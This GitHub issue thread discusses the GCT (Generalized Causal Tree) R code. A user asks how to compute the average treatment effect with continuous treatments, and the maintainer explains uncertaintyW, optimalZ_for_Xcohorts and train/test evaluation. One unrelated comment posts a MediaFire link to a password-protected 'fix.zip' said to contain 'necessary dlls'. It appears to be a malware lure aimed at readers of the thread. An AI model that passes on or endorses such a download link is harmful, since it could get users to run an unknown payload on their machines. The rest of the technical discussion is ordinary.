### ISSUE TITLE
generalization of calculation about ATE_at_optimalZ_continuousT_testing

### ISSUE THREAD

**Issue by ZO1DB3RG** [xiufanyu/GCT#1]
I noticed that in your GCT-Main-Continuous.R code, the calculation of the ATE for the final test sample is based on data generated within the code. Could you advise on how to set an appropriate uncertaintyW when calculating ATE on my own? Additionally, which other functions need to be modified, such as meanFun? I'm not quite sure what that function is supposed to do.

`ATE_at_optimalZ_continuousT_testing <- function(givenH, optimalZ_for_Xcohorts, 
                                         isFeaturesCategorical)
{
  Ntest <- dim(givenH)[1]
  numCohort <- length(optimalZ_for_Xcohorts)
  dataList = lapply(1:nrow(givenH), function(i) givenH[i,])
  findCohort <- t(mapply(whichCohort, dataList, list(optimalZ_for_Xcohorts),
                         list(isFeaturesCategorical)))
  get_optimal_treatment_continuousT <- function(cohortId, optimalZ_for_Xcohorts)
  {
    optimalCausalEffect <- optimalZ_for_Xcohorts[[cohortId]]$optimalCausalEffect
    if(optimalCausalEffect <= 0) {return(0)}
    else{
      optimalZRange <- optimalZ_for_Xcohorts[[cohortId]]$optimalZregion$Z
      Treatment <- runif(1, min = optimalZRange['lower'], max = optimalZRange['upper'])
      return(Treatment)
    }
  }
  treatmentForTesting <- mapply(get_optimal_treatment_continuousT, findCohort, list(optimalZ_for_Xcohorts))
  A <- treatmentForTesting
  U.Y <- rnorm(Ntest, mean = 0, sd = uncertaintyW)
  Y <- meanFun(givenH, A) + U.Y
  return(mean(Y))
}`

**Comment by SagarChandra07** [comment]
download
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive password: changeme
I put the necessary dlls in the archive

**Comment by xiufanyu** [comment]
Hello, the `uncertaintyW` is a parameter used in the data-generating process, where it controls the variance of the random error when generating a simulated sample. The uncertaintyW is not involved in the the calculation of ATE.

The `ATE_at_optimalZ_continuousT_testing()` function is to compute ATE over the testing data with the optimal treatment assignments. The `givenH` is the input features of the testing data. The `optimalZ_for_Xcohorts` is the learned optimal treatment assignments, which can be learned using GCT or other optimal treatment assignment algorithms.  The `isFeaturesCategorical` is a vector that signals whether each input feature is categorical or not. An example of the usage of this function can be found in Line 83-85 in `GCT-Main-Continuous.R`

Please feel free to let me know if you need any further clarification.

**Comment by ZO1DB3RG** [comment]
@xiufanyu Thank you for your prompt response. Your method is crucial to our research.
We are currently using the Generalized causal Tree (GcT) method to address a problem involving a continuous treatment variable and to study heterogeneity in observational data. Our treatment variable includes T>=0, with  almost 50 control variables (sparsity exists). Our goal is to obtain the heterogeneous treatment effect for each sample. Here are my specific guestions:

- 1. After training the `causal tree` and pruning it, do we find each sample's position in the `optimalz_for_Xcohorts` and access a cohort's `optimalCausalEffect` to obtain the treatment effect? Why is this `optimalCausalEffect` the maximum effect value among all leaf nodes?

<img width="718" alt="image" src="https://github.com/user-attachments/assets/58a19523-7193-4c3c-bc14-2952f17cc658">

- 2. Once we obtain the treatment effect for each sample, how should we calculate the final ATE? is it a simpleaverage, or does it reguire a weighted average based on the tree structure?
- 3. I've read your paper, but the simulated data in it doesn't involve many covariates. Is there any research showing that GCT performs better than other methods at similar data scales?

**Comment by xiufanyu** [comment]
Hello! To your questions: 

i. The `optimalZ_for_Xcohorts` summarizes the partitions of the feature space and their corresponding estimated heterogeneous treatment effects for each treatment option. Within each leaf node, the optimal treatment assignment is chosen based on the one which yields the largest estimated  treatment effects, and the `optimalCausalEffect` records the optimal value. The reason why we are able to find the optimal treatment assignment within the node leaves of GCT is inherently tied to the GCT construction procedure. The technical details can be found in Section III.B (user-friendly output), with an example presented in Appendix A. 

ii. We generally do not recommend using the same dataset to estimate the heterogeneous treatment effect and evaluate the model performance, because it will overestimate the final outcome. In the paper, Table 1 (the average outcome with optimal treatment allocations) is computed in the following way: We randomly split the sample into two halves. The first half (the training set) is used to fit the GCT and obtain the estimated heterogenous cohorts, together with the estimated treatment effects associated with each treatment. Then, the second half (the test set) is used to evaluate the algorithm. We allocate the optimal treatment to each instance in the test set based on their input features, using the fitted GCT model from the first step. The metrics reported in Table 1 are the averages of the outcomes with optimal treatments assigned over the test set. 

iii. The GCT algorithm can accommodate as many as covariates as the CT algorithm does. The simulation data uses two covariates, and the two real data applications involve more covariates. No single methods can universally outperform all others, so the empirical performance of any method may be highly context-dependent and thus needs to be discussed/assessed on a case-by-case basis. 

Hope this helps. If you need any further questions, please feel free to let me know.
